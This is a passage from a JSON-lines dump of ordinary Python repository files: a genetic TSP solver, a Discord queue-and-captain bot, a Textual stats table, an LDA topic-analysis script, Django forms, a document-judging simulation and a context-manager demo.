\n\n\n","repo_name":"tsvetlin/rpihat","sub_path":"hat.py","file_name":"hat.py","file_ext":"py","file_size_in_byte":4629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10805991745","text":"from ShortestPath.Main import Main\r\nimport random\r\nfrom builtins import staticmethod\r\n\r\n\r\n\r\n#filename = \"input_easy.txt\"\r\n#filename = \"input_med.txt\"\r\nfilename = \"input_hard.txt\"\r\nmain = Main(filename)\r\nmain.citireDate()\r\n\r\n\r\nGRAF = main.g\r\nDIM_POPULATIE = main.g.getNrNoduri()\r\n##TARGET = main.drumMinim().get_l()\r\n\r\nCROMOZOMI_CASTIGATORI = 1\r\nTOURNAMENT_SELECTION_SIZE = 3\r\n\r\nRATA_MUTATIE = 0.25\r\n\r\nclass Cromozom:\r\n ''''''\r\n def __init__(self):\r\n self.__individ = [];\r\n \r\n \r\n for i in range(1,DIM_POPULATIE +1):\r\n self.__individ.append(i);\r\n \r\n random.shuffle(self.__individ)\r\n \r\n def set_individ(self,list):\r\n self.__individ = list \r\n \r\n def get_individ(self):\r\n return self.__individ\r\n \r\n \r\n def get_fitness(self):\r\n fitness = 0;\r\n for i in range(0,len(self.__individ)-1):\r\n dist = GRAF.get_distanta(self.__individ[i],self.__individ[i+1])\r\n fitness = fitness + dist\r\n \r\n \r\n dist = GRAF.get_distanta(self.__individ[-1],self.__individ[0])\r\n fitness +=dist\r\n \r\n return fitness\r\n \r\n def __str__(self):\r\n string = \"[\";\r\n for i in self.__individ:\r\n string += str(i) + \" , \"\r\n \r\n string += str(self.__individ[0]) + \"]\"\r\n return string\r\n \r\n \r\n \r\nclass Populatie:\r\n def __init__(self,size):\r\n \r\n self.__cromozomi = [];\r\n for i in range(size):\r\n self.__cromozomi.append(Cromozom())\r\n \r\n \r\n def get_cromozomi(self): \r\n self.__cromozomi.sort(key=lambda x: x.get_fitness(), reverse=False)\r\n return self.__cromozomi\r\n \r\n \r\n\r\nclass AlgEvolutiv:\r\n ''''''\r\n \r\n \r\n \r\n @staticmethod\r\n def evolve_population(populatie):\r\n return AlgEvolutiv.mutate_population(AlgEvolutiv.crossover_population(populatie))\r\n \r\n @staticmethod\r\n def crossover_population(populatie):\r\n crossoverPopulation = Populatie(0)\r\n \r\n for i in range(CROMOZOMI_CASTIGATORI):\r\n crossoverPopulation.get_cromozomi().append(populatie.get_cromozomi()[i])\r\n \r\n i = CROMOZOMI_CASTIGATORI\r\n while i < DIM_POPULATIE:\r\n cromozom1 = AlgEvolutiv.select_tournament_population(populatie).get_cromozomi()[0]\r\n cromozom2 = AlgEvolutiv.select_tournament_population(populatie).get_cromozomi()[0]\r\n crossoverPopulation.get_cromozomi().append(AlgEvolutiv.crossover_chromosomes(cromozom1, cromozom2));\r\n i+=1\r\n \r\n return crossoverPopulation\r\n \r\n @staticmethod\r\n def mutate_population(populatie):\r\n for i in range(CROMOZOMI_CASTIGATORI,DIM_POPULATIE):\r\n AlgEvolutiv.mutate_chromosomes(populatie.get_cromozomi()[i])\r\n \r\n return populatie\r\n \r\n @staticmethod\r\n def crossover_chromosomes(cromozom1,cromozom2):\r\n cromozom_rez = Cromozom()\r\n \r\n lista_perm = [0] * DIM_POPULATIE\r\n \r\n start = random.randint(0,DIM_POPULATIE-1)\r\n stop = random.randint(0,DIM_POPULATIE-1)\r\n \r\n if start == stop:\r\n return cromozom1\r\n \r\n if start > stop:\r\n aux = start\r\n start = stop\r\n stop = aux\r\n \r\n while start <= stop:\r\n lista_perm[start] = cromozom1.get_individ()[start]\r\n start+=1\r\n \r\n \r\n i1 = stop+1\r\n i2 = stop+1\r\n \r\n while 0 in lista_perm:\r\n if i1 == DIM_POPULATIE:\r\n i1 = 0\r\n \r\n if i2 == DIM_POPULATIE:\r\n i2 = 0\r\n \r\n if cromozom2.get_individ()[i2] in lista_perm:\r\n i2 +=1\r\n else:\r\n lista_perm[i1] = cromozom2.get_individ()[i2]\r\n i1+=1\r\n i2+=1\r\n \r\n \r\n cromozom_rez.set_individ(lista_perm)\r\n return cromozom_rez\r\n \r\n @staticmethod\r\n def mutate_chromosomes(cromozom):\r\n for i in range(DIM_POPULATIE):\r\n if random.random() < RATA_MUTATIE:\r\n ind1 = random.randint(0,DIM_POPULATIE-1)\r\n ind2 = random.randint(0,DIM_POPULATIE-1)\r\n \r\n aux = cromozom.get_individ()[ind1]\r\n cromozom.get_individ()[ind1] = cromozom.get_individ()[ind2]\r\n cromozom.get_individ()[ind2] = aux\r\n \r\n return\r\n \r\n \r\n @staticmethod\r\n def select_tournament_population(pop):\r\n tournament_pop = Populatie(0)\r\n \r\n for i in range(TOURNAMENT_SELECTION_SIZE):\r\n size = len(pop.get_cromozomi())\r\n tournament_pop.get_cromozomi().append(pop.get_cromozomi()[random.randint(0,size-1)])\r\n \r\n \r\n \r\n return tournament_pop\r\n \r\n \r\n \r\n def __init__(self,nrGeneratii):\r\n populatie = Populatie(8);\r\n\r\n gen = 0\r\n print_populatie(populatie, gen)\r\n \r\n while gen < nrGeneratii:\r\n \r\n populatie = AlgEvolutiv.evolve_population(populatie)\r\n gen+=1\r\n print_populatie(populatie, gen)\r\n\r\n\r\ndef print_populatie(pop,gen_nr):\r\n print(\"\\n.........................\")\r\n print(\"Generation \" + str(gen_nr))\r\n print(\"...........................\")\r\n i = 0\r\n for x in pop.get_cromozomi():\r\n print(\"Cromozomul \" + str(i) + \" : \" + x.__str__() + \" ; FITNESS = \" + str(x.get_fitness()))\r\n i +=1\r\n \r\n \r\n \r\n\r\nstart = AlgEvolutiv(10)\r\n\r\n\r\n \r\n\r\n\r\n\r\n ","repo_name":"LauraDiosan-CS/lab04-gatsp-odrinOp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25237177477","text":"import asyncio\nimport discord\nimport myToken\nimport random\nimport datetime\nfrom datetime import datetime\n \nfrom discord.ext import commands\nfrom discord.ext.commands import Cog, BucketType\nfrom discord.ext.commands import bot\nfrom discord.ext.commands import (command, cooldown, CommandOnCooldown)\n \n \n# loads of vars we'll need to persist\nbot = commands.Bot(command_prefix=myToken.prefix,\n description=myToken.description)\n \n@bot.event\nasync def on_ready():\n await bot.change_presence(activity=discord.Activity(type=discord.ActivityType.playing, name=\"#support to join 10mans\"))\n print(\"Bot is online and working somewhat\")\n \nourServer = None\ninProgress = False\nqueueUsers = []\nfirstCaptain = None\nsecondCaptain = None\nteamOne = []\nteamTwo = []\ncurrentPickingCaptain = \"\"\npickNum = 1\nteam1ChannelId = 698323152836493312\nteam2ChannelId = 698323212773228584\nlastGameChannelId = 824104178175180830\nserverName = myToken.guildID\n\n \n# Split logger to log to console and file\nimport logging\nlogging.basicConfig(level=logging.INFO)\nlogFormatter = logging.Formatter(\"%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s\")\nrootLogger = logging.getLogger()\n\nfileHandler = logging.FileHandler(\"logs.log\")\nfileHandler.setFormatter(logFormatter)\nrootLogger.addHandler(fileHandler)\n\n# Vice ids\nqueue_na_role_id = 700235039161581619\nqueue_eu_role_id = 820818871812489236\nlastgame_role_id = 719625580596691054\nlastgame_role_ready_id = 719625720581718055\ntenman_role_id = 796195408920444951\ncaptain_role_id = 698343215119597669\nqueue_na_id = 698323056484941914\nqueue_eu_id = 822288145374511114\nqueue_last_id = 824104178175180830\nqueue_teams_ids = [698323152836493312, 698323212773228584,\n 820097295209988098, 820097306488733717]\nchannel_id = 698328368676077698\n\n\n\n\n\n@bot.event\nasync def on_voice_state_update(member, before, after):\n\n # Member joined a channel\n if before.channel is None and after.channel is not None:\n\n # Queue #1\n if after.channel.id == queue_na_id:\n await check_ready(member, queue_na_role_id, after)\n\n # Queue #2\n elif after.channel.id == queue_eu_id:\n await check_ready(member, queue_eu_role_id, after)\n\n # Queue teams\n elif after.channel.id in queue_teams_ids:\n await add_role(member, lastgame_role_ready_id)\n\n # Queue last\n elif after.channel.id == queue_last_id:\n await check_ready(member, lastgame_role_ready_id, after)\n\n # Member left a channel\n elif before.channel is not None and after.channel is None:\n\n # Queue #1\n if before.channel.id == queue_na_id:\n await remove_role(member, queue_na_role_id)\n\n # Queue #2\n elif before.channel.id == queue_eu_id:\n await remove_role(member, queue_eu_role_id)\n\n # Queue teams\n elif before.channel.id in queue_teams_ids:\n await remove_role(member, lastgame_role_id)\n\n # Queue last\n elif before.channel.id == queue_last_id:\n await remove_role(member, lastgame_role_ready_id)\n\n # Member switched channels\n elif before.channel.id != after.channel.id:\n\n # Left queue #1\n if before.channel.id == queue_na_id:\n await remove_role(member, queue_na_role_id)\n\n # Left queue #2\n elif before.channel.id == queue_eu_id:\n await remove_role(member, queue_eu_role_id)\n\n # Left queue last\n elif before.channel.id == queue_last_id:\n await remove_role(member, lastgame_role_ready_id)\n\n # Left queue teams\n elif before.channel.id in queue_teams_ids:\n await remove_role(member, lastgame_role_id)\n\n # Joined queue #1\n if after.channel.id == queue_na_id:\n await check_ready(member, queue_na_role_id, after)\n\n # Joined queue #2\n elif after.channel.id == queue_eu_id:\n await check_ready(member, queue_eu_role_id, after)\n\n # Joined queue teams\n elif after.channel.id in queue_teams_ids:\n await add_role(member, lastgame_role_id)\n\n # Joined queue last\n if after.channel.id == queue_last_id:\n await check_ready(member, lastgame_role_ready_id, after)\n\n\ndef get_role(member, role_id):\n return discord.utils.get(member.guild.roles, id=role_id)\n\n\ndef member_name(member):\n return f'{member.nick} - {member.mention}'\n\n\nasync def remove_role(member, role_id):\n logging.info(f'Attempting to remove role \\\"{role_id}\\\" from member \\\"{member_name(member)}\\\"')\n role = get_role(member, role_id)\n await member.remove_roles(role)\n\n\nasync def add_role(member, role_id):\n logging.info(f'Attempting to add role \\\"{role_id}\\\" to member \\\"{member_name(member)}\\\"')\n role = get_role(member, role_id)\n await member.add_roles(role)\n\n\nasync def check_ready(member, role_id, after):\n logging.info(f'Member \\\"{member_name(member)}\\\" joined queue: \\\"{after.channel.name}\\\"')\n role = get_role(member, role_id)\n await member.add_roles(role)\n\n if len(after.channel.members) == after.channel.user_limit:\n captains = await choose_captains(role, after)\n\n channel = bot.get_channel(channel_id)\n bot_avatar = bot.user.avatar_url\n embed = discord.Embed()\n embed.set_thumbnail(url=bot_avatar)\n embed.add_field(name=\"**Queue Filled**\",\n value=f'<#{after.channel.id}> has reached 10 players. Captains will start the picking process.',\n inline=False)\n embed.add_field(name=\"**Captains**\", value=f'{captains[0].mention} and {captains[1].mention}', inline=False)\n\n if random.randint(0, 1):\n captains.reverse()\n \n embed.add_field(name=\"**Captain Selections**\",\n value=f'{captains[0].mention} has been chosen for first pick and will add players to join the party.\\n{captains[1].mention} has been chose for map pick and side pick.',\n inline=False)\n embed.set_footer(text='Vice Valorant 10mans/Scrims', icon_url=bot_avatar)\n embed.color = (0xFEE354)\n await channel.send(content=f'{role.mention}', embed=embed)\n\n\n \n\n\nasync def choose_captains(role, after):\n logging.info(f'Attempting to choose captains from the members of the role \\\"{role.id}\\\"')\n members = after.channel.members\n # members_copy = list(members)\n # captain_roles = []\n # for member in members:\n # if any([captain_role_id == x.id for x in member.roles]):\n # captain_roles.append(member)\n # members_copy.remove(member)\n\n # num_captains = len(captain_roles)\n # if num_captains == 0:\n # return random.sample(members, 2)\n # elif num_captains == 1:\n # captains = list(captain_roles)\n # captains.append(random.choice(members_copy))\n # return captains\n # else:\n return random.sample(members, 2)\n\n@bot.command()\n@commands.has_role('Hosts')\nasync def qstart(ctx):\n channel = bot.get_channel(lastGameChannelId)\n role = discord.utils.find(lambda r: r.name == 'lastgame', ctx.message.guild.roles)\n \n if len(channel.members) == channel.limit:\n captains = await choose_captains(role, channel)\n \n bot_avatar = bot.user.avatar_url\n embed = discord.Embed()\n embed.set_thumbnail(url=bot_avatar)\n embed.add_field(name=\"**Queue Filled**\",\n value=f'{channel.name} has reached 10 players. Captains will start adding players on VALORANT to fill the party.',\n inline=False)\n embed.add_field(name=\"**Captains**\", value=f'{captains[0].mention} and {captains[1].mention}', inline=False)\n \n if random.randint(0, 1):\n captains.reverse()\n \n embed.add_field(name=\"**Captain Selections**\",\n value=f'{captains[0].mention} has been chosen for first pick and will add players to join the party.\\n{captains[1].mention} has been chosen for map and side.',\n inline=False)\n embed.set_footer(text='Vice Valorant 10mans/Scrims', icon_url=bot_avatar)\n embed.color = (0xF8C300)\n await ctx.send(content=f'{role.mention}', embed=embed)\n else:\n await ctx.send('no')\n\nasync def on_ready(ctx ,members, message):\n\n voice_channel = ctx.guild.get_channel(699429428035321927)\n members = voice_channel.members #finds members connected to the channel\n\n memids = [] #(list)\n for member in members:\n memids.append(member.id)\n\n@bot.command()\nasync def test2(message, memids):\n if \"wow\" in message.content:\n await message.send(memids)\n\n\nbot.run(myToken.token)","repo_name":"graeeee/testing123","sub_path":"vicebot.py","file_name":"vicebot.py","file_ext":"py","file_size_in_byte":8885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70249367149","text":"from __future__ import annotations\r\nfrom textual.app import ComposeResult\r\nfrom typing import Tuple\r\nfrom textual.widgets import DataTable, Static\r\n\r\nCOLUMNS_DEFINITION = [\r\n (\"Name\", 33),\r\n (\"Kit\", 8),\r\n (\"Weapon\", 8),\r\n (\"Health\", 7), \r\n (\"Helmet\", 6), \r\n (\"Money\", 13), \r\n (\"K\", 5), \r\n (\"A\", 5), \r\n (\"D\", 5), \r\n (\"ADR\", 6),\r\n]\r\n\r\nclass PlayerStat:\r\n def __init__(self, name, has_kit, weapon, health, has_helmet, money, k, a, d, adr):\r\n self.name = name\r\n self.has_kit = has_kit\r\n self.weapon = weapon\r\n self.health = health\r\n self.has_helmet = has_helmet\r\n self.money = money\r\n self.k = k\r\n self.a = a\r\n self.d = d\r\n self.adr = adr\r\n \r\n def to_row(self) -> Tuple:\r\n return (\r\n self.name, \r\n \"V\" if self.has_kit else \"X\",\r\n self.weapon, \r\n self.health, \r\n \"V\" if self.has_helmet else \"X\", \r\n self.money, \r\n self.k, self.a, self.d, self.adr\r\n )\r\n \r\n @staticmethod\r\n def from_dict(data):\r\n return PlayerStat(\r\n data['name'],\r\n False if not('hasDefuseKit' in data) else data['hasDefuseKit'],\r\n 'AK',\r\n data['hp'],\r\n data['helmet'],\r\n data['money'],\r\n data['score'],\r\n data['assists'],\r\n data['deaths'],\r\n data['damagePrRound']\r\n )\r\n \r\n\r\nclass TeamStats(Static):\r\n def __init__(self, stats:list[PlayerStat], id:str):\r\n Static.__init__(self)\r\n self.custom_stats = stats\r\n self.id = id\r\n\r\n def compose(self) -> ComposeResult:\r\n yield DataTable(show_cursor=False)\r\n\r\n def on_mount(self) -> None:\r\n table = self.query_one(DataTable)\r\n for column in COLUMNS_DEFINITION:\r\n table.add_column(column[0], width=column[1])\r\n self.update_data(self.custom_stats)\r\n\r\n def update_data(self, data:list[PlayerStat]):\r\n table = self.query_one(DataTable)\r\n table.clear()\r\n table.add_rows(map(lambda entry : entry.to_row(), data))","repo_name":"ArthurAttout/HLTV-Textual","sub_path":"TeamStats.py","file_name":"TeamStats.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72097347628","text":"from i_vectorizer import GensimVectorizer_Topic_Discovery\nimport pickle\nfrom gensim.models import LdaModel\nimport pandas as pd\nimport bs4\nfrom b_sqlite_operation import SqliteOperation\nimport xlwings\nimport time\nfrom h_readsqlite import load_from_pickle, save_to_pickle\nfrom h_readsqlite import create_faulty_dict, create_total_index, create_existing_data_index\n\n# The purpose of this script is to get the data from existing LDA model. \n# The retreived data will be used for further analysis.\n\n# The index for existing data is necessary before executing this script.\n# To get the index, go back to h_readsqlite.py and execute:\n# 1. create_total_index 2. create_faulty_dict 3. create_existing_data_index\n# 4. Save it in pickle 5. Show in Table.\n\n#!!! This code needs to be executed once, because the result as Dataframe \n# & pickle is saved under DF_DOMINANT_TOPIC_PATH and can be called\n# multiple times by:\n# a = load_from_pickle(DF_DOMINANT_TOPIC_PATH)\n# b = xlwings.view(a.head(100))\n\n\nDB_PATH = \"DB/StackOverflow.sqlite\"\nLEXICON_PATH = \"other/model_2012-2021_1/lexicon.pkl\"\nDOCMATRIX_PATH = \"other/model_2012-2021_1/doc_matrix.pickle\"\nMODEL_PATH = \"other/model_2012-2021_1/LDA_model_6_topics\"\nSTART_YEAR = 2012\nEND_YEAR = 2021\nLIMIT = None\n\nFOLDER_PATH = \"other/model_2012-2021_1/index\"\nFAULTY_FILE_NAME = \"faulty_data_index\"\nTOTAL_FILE_NAME = \"total_data_index\"\nEXISTING_INDEX_PATH = \"existing_data_index\"\n\nDF_DOMINANT_TOPIC_PATH = \"other/model_2012-2021_1/index/df_dominant_topic.pickle\"\n\ntotal_path = \"{}/{}.pickle\".format(FOLDER_PATH, TOTAL_FILE_NAME)\n# \"other/model_2012-2021_1/index/total_data_index.pickle\"\nfaulty_path = \"{}/{}.pickle\".format(FOLDER_PATH, FAULTY_FILE_NAME)\n# \"other/model_2012-2021_1/index/faulty_data_index.pickle\"\nexisting_index_path = \"{}/{}.pickle\".format(FOLDER_PATH, EXISTING_INDEX_PATH)\n# \"other/model_2012-2021_1/index/existing_data_index.pickle\"\n\n### 0. Initialization:\ndef initialization():\n # a. create faulty_dict b. create total_index \n # c. remove faulty_index from total_index (using result from a and b)\n # This step is necessary before executing further codes.\n # Necessary because not all documents from DB can be parsed into string, \n # therefore some documents with errors were skipped. Therefore the \n # id sequence is messed up, due to some missing docs (0.02%)\n start_time = time.time()\n # Create dict containing docs that can't be parsed:\n create_faulty_dict(DB_PATH, FOLDER_PATH, FAULTY_FILE_NAME)\n # Get the id of all docs:\n create_total_index(DB_PATH, FOLDER_PATH, TOTAL_FILE_NAME)\n # Remove the faulty index (stored in faulty_dict) from total_index and saved\n # in existing_data_index.pickle\n create_existing_data_index(total_path, faulty_path, existing_index_path)\n a = load_from_pickle(total_path)\n b = load_from_pickle(faulty_path)\n c = load_from_pickle(existing_index_path)\n\n for i in list(a.keys()):\n print(\"Year {}: {}\".format(i, len(a[i])-len(b[i])==len(c[i])))\n print(len(a[i]), len(b[i]), len(c[i]))\n end_time = time.time()\n print(\"Duration: {} seconds\".format(round(end_time-start_time, 2)))\n return\n\n# initialization()\n\n### 1. Loading Lexicon\nprint(\"Read Gensim Dictionary / Lexicon\")\nvectorizer = GensimVectorizer_Topic_Discovery(LEXICON_PATH)\nprint(vectorizer.id2word.token2id)\nprint(\"Finish reading Gensim Dictionary\")\n\n### 2. Loading Doc Matrix\nprint(\"Start reading Doc Matrix / Corpus\")\ndocmatrix = None\nwith open(DOCMATRIX_PATH, \"rb\") as f:\n docmatrix = pickle.load(f)\nprint(\"Finish reading DocMatrix.\")\n\n### 3. Loading LDA model\nprint(\"Loading LDA model\")\nldamodel = LdaModel.load(MODEL_PATH)\nprint(\"Finish reading LDA transformer.\")\n\n### 4. Getting corpus texts from DB\nprint(\"Getting corpus texts\")\nbase_query = \"\"\"\n SELECT preprocessed_datas.id, preprocessed_datas.content\n from preprocessed_datas\n JOIN raw_datas\n ON raw_datas.id = preprocessed_datas.id\n WHERE substr(raw_datas.creation_date, 1, 4) = \"{}\"\n\"\"\"\n# db_handle = SqliteCorpusReader(DB_PATH)\ndb_obj = SqliteOperation(DB_PATH)\nid_doc_list = []\nfor year in range(START_YEAR, END_YEAR+1):\n print(\"Reading corpus from Y{}\".format(year))\n current_query = base_query.format(str(year))\n # docs = db_handle.docs(year, limit=LIMIT)\n db_obj.execute_query(current_query)\n docs = list(db_obj.last_cursor)\n id_doc_list += list(docs)\nprint(\"Removing tags\")\nid_list, doc_list = [], []\nfor id, doc in id_doc_list:\n id_list.append(id)\n doc_str = bs4.BeautifulSoup(doc, 'lxml').text\n doc_list.append(doc_str)\nid_doc_list = None # Erase unnecessary datas from memory\nprint(\"Finish reading DB\")\n\n### 5. Creating humanreadable table\nprint(\"Getting topics\")\ndef format_topics_sentences(ldamodel, corpus, docs, limit:int=None):\n # Init output\n sent_topics_df = pd.DataFrame()\n if limit is None:\n targetCorpus = corpus\n else:\n targetCorpus = corpus[:limit]\n # Get main topic in each document\n for i, row in enumerate(ldamodel[targetCorpus]):\n row = sorted(row, key=lambda x: (x[1]), reverse=True)\n # Get the Dominant topic, Perc Contribution and Keywords for each document\n for j, (topic_num, prop_topic) in enumerate(row):\n if j == 0: # => dominant topic\n wp = ldamodel.show_topic(topic_num)\n topic_keywords = \", \".join([word for word, prop in wp])\n sent_topics_df = sent_topics_df.append(pd.Series([int(topic_num), round(prop_topic,4), topic_keywords]), ignore_index=True)\n else:\n break\n sent_topics_df.columns = ['Dominant_Topic', 'Perc_Contribution', 'Topic_Keywords']\n\n # Add original text to the end of the output\n contents = pd.Series(doc_list)\n sent_topics_df = pd.concat([sent_topics_df, contents], axis=1)\n sent_topics_df.reset_index(inplace=True)\n sent_topics_df.columns = ['Document_No', 'Dominant_Topic', 'Topic_Perc_Contrib', 'Keywords', 'Text']\n return(sent_topics_df)\n\n# 6. To get the correct Document ID under column Document_No execute:\nexisting_index = load_from_pickle(existing_index_path)\nrelevant_index = []\nfor year in range(START_YEAR, END_YEAR+1):\n relevant_index.extend(existing_index[year])\n\n# 7. Generate relevant doc_list and exclude the 841 unparseable data:\na = load_from_pickle(total_path)\nb = load_from_pickle(faulty_path)\nlist_a, list_b, list_index = [], [], []\nfor year in range(START_YEAR, END_YEAR+1):\n list_a.extend(a[year])\n list_b.extend(b[year])\nfor i in list_b:\n list_index.append(list_a.index(i))\nlist_index.sort(reverse=True)\nfor i in list_index:\n del doc_list[i]\n\n# 7. Show the table\nprint(\"Creating DF\")\ndf_dominant_topic = format_topics_sentences(ldamodel, docmatrix, doc_list, LIMIT)\nif LIMIT == None:\n df_dominant_topic['Document_No'] = relevant_index\nelse:\n df_dominant_topic['Document_No'] = relevant_index[:LIMIT]\nprint(df_dominant_topic.head(10))\nsave_to_pickle(content=df_dominant_topic, file_path=DF_DOMINANT_TOPIC_PATH)\nprint(\"Open table in Excel\")\nxlwings.view(df_dominant_topic.head(100))\nprint(\"Finish reading topics.\")","repo_name":"gunardilin/NLP_StackOverflow","sub_path":"p_prepare_analysis_data_a.py","file_name":"p_prepare_analysis_data_a.py","file_ext":"py","file_size_in_byte":7098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41226626248","text":"# DJNAGO DECLARATIONS\nfrom django import forms\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.models import User\n\n# APP DECLARATIONS\nimport app.models as am\n\n# DECLARING CLASSES\nclass RegisterForm(UserCreationForm):\n email = forms.EmailField(required=True)\n\n class Meta:\n model = User\n fields = (\"email\", \"password1\", \"password2\")\n\n def save(self, commit=True):\n user = super(RegisterForm, self).save(commit=False)\n user.email = self.cleaned_data['email']\n if commit:\n user.save()\n return user\n\n\nclass TaskForm(forms.ModelForm):\n\n class Meta:\n model = am.Task\n fields = (\n 'id',\n 'version',\n 'task_name',\n 'task_description',\n 'task_type',\n 'task_end',\n 'user_profile',\n 'priority',\n 'status')\n\n def __init__(self, *args, **kwargs):\n super(TaskForm, self).__init__(*args, **kwargs)\n for field_name, field in self.fields.items():\n field.widget.attrs['class'] = 'form-control'\n self.fields['version'].required = True\n self.fields['task_name'].required = True\n self.fields['task_description'].required = True\n self.fields['task_type'].required = True\n self.fields['task_end'].required = True\n self.fields['user_profile'].required = True\n self.fields['status'].required = True\n self.fields['priority'].required = True\n\n\nclass VersionForm(forms.ModelForm):\n\n class Meta:\n model = am.Version\n fields = (\"project\", \"version_name\", \"date_of_release\")\n\n def __init__(self, *args, **kwargs):\n super(VersionForm, self).__init__(*args, **kwargs)\n for field_name, field in self.fields.items():\n field.widget.attrs['class'] = 'form-control'\n\n\nclass ProjectForm(forms.ModelForm):\n\n class Meta:\n model = am.Project\n fields = (\"company\", \"project_name\", \"project_description\")\n\n def __init__(self, *args, **kwargs):\n super(ProjectForm, self).__init__(*args, **kwargs)\n for field_name, field in self.fields.items():\n field.widget.attrs['class'] = 'form-control'","repo_name":"ajappdev/devocular","sub_path":"app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39865456501","text":"from typing import List\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\nimport tqdm\n\nclass HeapNode():\n def __init__(self, value):\n self.children: List[HeapNode] = []\n self.equivalenceClass: List[int] = [value]\n \n def equal(self, otherNode):\n self.equivalenceClass.extend(otherNode.equivalenceClass)\n self.children.extend(otherNode.children)\n return self\n\n def greaterThan(self, otherNode):\n self.children.append(otherNode)\n return self\n\n def lessThan(self, otherNode):\n return otherNode.greaterThan(self)\n \n def __str__(self) -> str:\n childStrings = \", \".join(str(c) for c in self.children)\n return f\"{self.equivalenceClass} => ({childStrings})\"\n\ndef doTrial(numDocuments: int):\n round = 0\n totalSteps = 0\n documents = [HeapNode(i) for i in range(numDocuments)]\n equivalenceClasses = []\n while len(documents) > 0:\n step = 0\n currentRoundRoot = documents[0] \n for i in range(1,len(documents)):\n nextChoice = random.randint(-1,1)\n # print(f\"ROUND {round} STEP {step}: {currentRoundRoot.equivalenceClass}, {documents[i].equivalenceClass}, CHOICE: {nextChoice}\")\n if nextChoice == -1:\n currentRoundRoot = currentRoundRoot.greaterThan(documents[i])\n if nextChoice == 0:\n currentRoundRoot = currentRoundRoot.equal(documents[i])\n if nextChoice == 1:\n currentRoundRoot = currentRoundRoot.lessThan(documents[i])\n step += 1\n documents = currentRoundRoot.children\n equivalenceClasses.append(currentRoundRoot.equivalenceClass)\n\n totalSteps += step\n step = 0\n round += 1\n\n return totalSteps\n\n# --------------------------------------------------------------------------------------------------\n# SIMULATION\nNUM_TRIALS = 100\nresults = {}\nfor numDocuments in range(10,2000,50):\n results[numDocuments] = []\nfor trialIndex in tqdm.tqdm(range(NUM_TRIALS), desc=\"TRIALS\"):\n for numDocuments in results.keys():\n totalSteps = doTrial(numDocuments)\n results.get(numDocuments, []).append(totalSteps)\n\n# Aggregate all trial results\naggregatedResults = []\nfor numDocuments, trialResults in results.items():\n aggregatedResults.append((numDocuments, np.average(trialResults), np.std(trialResults)))\naggregatedResults.sort(key=lambda x: x[0])\naggregatedResults = np.array(aggregatedResults).T\n# print(aggregatedResults)\n\n# Plot results of aggregation\nplt.figure(figsize=(10,8))\nplt.errorbar(x=aggregatedResults[0, :], y=aggregatedResults[1, :], yerr=aggregatedResults[2, :], fmt=\"o-\", capsize=2)\n\n# Annotation for our samples\nX_VAL = 1440\nY_VAL = 2160\nplt.vlines(x=X_VAL, ymin=0, ymax=Y_VAL, colors=\"r\")\nplt.hlines(y=Y_VAL, xmin=0, xmax=X_VAL, colors=\"r\")\nplt.annotate(f\"({X_VAL}, {Y_VAL})\", (X_VAL, Y_VAL), (X_VAL+150, Y_VAL-400), arrowprops={\"width\": 1.5, \"headwidth\": 7, \"color\":\"k\", \"shrink\": 0.1})\n\nplt.xlim(left=0)\nplt.ylim(bottom=0)\nplt.title(f\"Average Number of Steps Required to Judge Document Collections\\n(Random Judgement, {NUM_TRIALS} Trials)\")\nplt.xlabel(\"Number of Documents\")\nplt.ylabel(\"Number of Steps\")\nplt.show()\n","repo_name":"hmcalister/JUDGO-Python-Testing","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"37847362079","text":"import sys; sys.stdin=open('2071.txt', 'r')\n\nT = int(input())\nfor tc in range(T):\n N = list(map(int, input().split()))\n sum = 0\n for i in N:\n sum += i\n average = sum/10\n print('#{} {}'.format(tc+1, round(average)))","repo_name":"nayulbak1/TIL","sub_path":"07_swea/2071.py","file_name":"2071.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39867490142","text":"\"\"\"\nVarianta uzuala\n\"\"\"\nwith open('some_file_1.txt', 'w') as opened_file:\n opened_file.write('Hola!')\n\n\"\"\"\nAlternativa\n\"\"\"\nfile = open('some_file_2.txt', 'w')\ntry:\n file.write('Hola!')\nfinally:\n file.close()\n\n\"\"\"\nImplementare specifica\n\"\"\"\n\n\nclass File(object):\n def __init__(self, file_name, method):\n self.file_obj = open(file_name, method)\n\n def __enter__(self):\n return self.file_obj\n\n def __exit__(self, type, value, traceback):\n self.file_obj.close()\n\n # metoda de exit daca returneaza True atunci orice exceptie este prinsa din interiorul context managerului\n # def __exit__(self, type, value, traceback):\n # print(\"Exception has been handled\")\n # self.file_obj.close()\n # return True\n\n\nwith File('demo.txt', 'w') as opened_file:\n # opened_file.write('Hola!')\n opened_file.ceva_ce_nu_este_definit('Hola!')\n\n\nfrom contextlib import contextmanager\n\n\"\"\"\nhttps://docs.python.org/3/library/contextlib.html\n\"\"\"\n\n\n@contextmanager\ndef open_file_custom(name):\n f = open(name, 'w')\n try:\n yield f\n finally:\n f.close()\n\n\nwith open_file_custom('some_file_custom.txt') as f:\n f.write('hola!')","repo_name":"hypermad/grupa_3","sub_path":"Intalnirea_14/context_manager.py","file_name":"context_manager.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15223367340","text":"import sys\nread = sys.stdin.readline\n\nfor _ in range(int(read())):\n cloth = dict()\n case = 1\n for i in 